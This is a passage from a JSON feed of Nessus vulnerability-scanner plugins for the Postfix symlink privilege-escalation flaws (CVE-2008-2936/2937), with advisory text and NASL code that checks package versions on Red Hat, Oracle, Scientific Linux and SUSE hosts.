value:\"http://www.nessus.org/u?3d4cd9ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix and / or postfix-pflogsumm packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"postfix-2.0.16-14.1.RHEL3\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"postfix-2.2.10-1.2.1.el4_7\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postfix-pflogsumm-2.2.10-1.2.1.el4_7\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:06:16", "description": "Updated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.", "edition": 27, "published": "2008-08-15T00:00:00", "title": "RHEL 3 / 4 / 5 : postfix (RHSA-2008:0839)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-15T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:postfix-pflogsumm", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.2", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:postfix"], "id": "REDHAT-RHSA-2008-0839.NASL", "href": "https://www.tenable.com/plugins/nessus/33893", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0839. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33893);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"RHSA\", value:\"2008:0839\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : postfix (RHSA-2008:0839)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0839\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix and / or postfix-pflogsumm packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postfix-pflogsumm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0839\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"postfix-2.0.16-14.1.RHEL3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", reference:\"postfix-2.2.10-1.2.1.el4_7\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postfix-pflogsumm-2.2.10-1.2.1.el4_7\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-pflogsumm\");\n }\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:44:13", "description": "From Red Hat Security Advisory 2008:0839 :\n\nUpdated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 / 5 : postfix (ELSA-2008-0839)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:3", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:postfix-pflogsumm", "p-cpe:/a:oracle:linux:postfix"], "id": "ORACLELINUX_ELSA-2008-0839.NASL", "href": "https://www.tenable.com/plugins/nessus/67738", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0839 and \n# Oracle Linux Security Advisory ELSA-2008-0839 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67738);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"RHSA\", value:\"2008:0839\");\n\n script_name(english:\"Oracle Linux 3 / 4 / 5 : postfix (ELSA-2008-0839)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0839 :\n\nUpdated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000708.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000709.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000710.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postfix-pflogsumm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"postfix-2.0.16-14.1.RHEL3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"postfix-2.0.16-14.1.RHEL3\")) flag++;\n\nif (rpm_check(release:\"EL4\", reference:\"postfix-2.2.10-1.2.1.el4_7\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postfix-pflogsumm-2.2.10-1.2.1.el4_7\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-pflogsumm\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:46:57", "description": "A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. CVE-2008-2936 and\nCVE-2008-2937 have been assigned to this problem.", "edition": 24, "published": "2008-08-15T00:00:00", "title": "openSUSE 10 Security Update : postfix (postfix-5501)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "modified": "2008-08-15T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:postfix-devel", "p-cpe:/a:novell:opensuse:postfix-mysql", "cpe:/o:novell:opensuse:10.3", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:postfix-postgresql", "p-cpe:/a:novell:opensuse:postfix"], "id": "SUSE_POSTFIX-5501.NASL", "href": "https://www.tenable.com/plugins/nessus/33897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postfix-5501.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33897);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\", \"CVE-2008-2937\");\n\n script_name(english:\"openSUSE 10 Security Update : postfix (postfix-5501)\");\n script_summary(english:\"Check for the postfix-5501 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. CVE-2008-2936 and\nCVE-2008-2937 have been assigned to this problem.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"postfix-2.3.2-32\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"postfix-devel-2.3.2-32\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"postfix-mysql-2.3.2-32\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"postfix-postgresql-2.3.2-32\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-2.4.5-20.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-devel-2.4.5-20.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-mysql-2.4.5-20.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-postgresql-2.4.5-20.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:46:57", "description": "A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. CVE-2008-2936 /\nCVE-2008-2937 have been assigned to this problem.", "edition": 24, "published": "2008-08-14T00:00:00", "title": "SuSE 10 Security Update : Postfix (ZYPP Patch Number 5500)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "modified": "2008-08-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_POSTFIX-5500.NASL", "href": "https://www.tenable.com/plugins/nessus/33888", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33888);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\", \"CVE-2008-2937\");\n\n script_name(english:\"SuSE 10 Security Update : Postfix (ZYPP Patch Number 5500)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. CVE-2008-2936 /\nCVE-2008-2937 have been assigned to this problem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2936.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2937.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5500.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"postfix-2.2.9-10.25.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"postfix-2.2.9-10.26\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"postfix-2.2.9-10.25.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postfix-2.2.9-10.26\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:39", "description": "A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. CVE-2008-2936 and\nCVE-2008-2937 have been assigned to this problem.", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : postfix (postfix-133)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:postfix-devel", "p-cpe:/a:novell:opensuse:postfix-mysql", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:postfix-postgresql", "p-cpe:/a:novell:opensuse:postfix"], "id": "SUSE_11_0_POSTFIX-080804.NASL", "href": "https://www.tenable.com/plugins/nessus/40111", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# 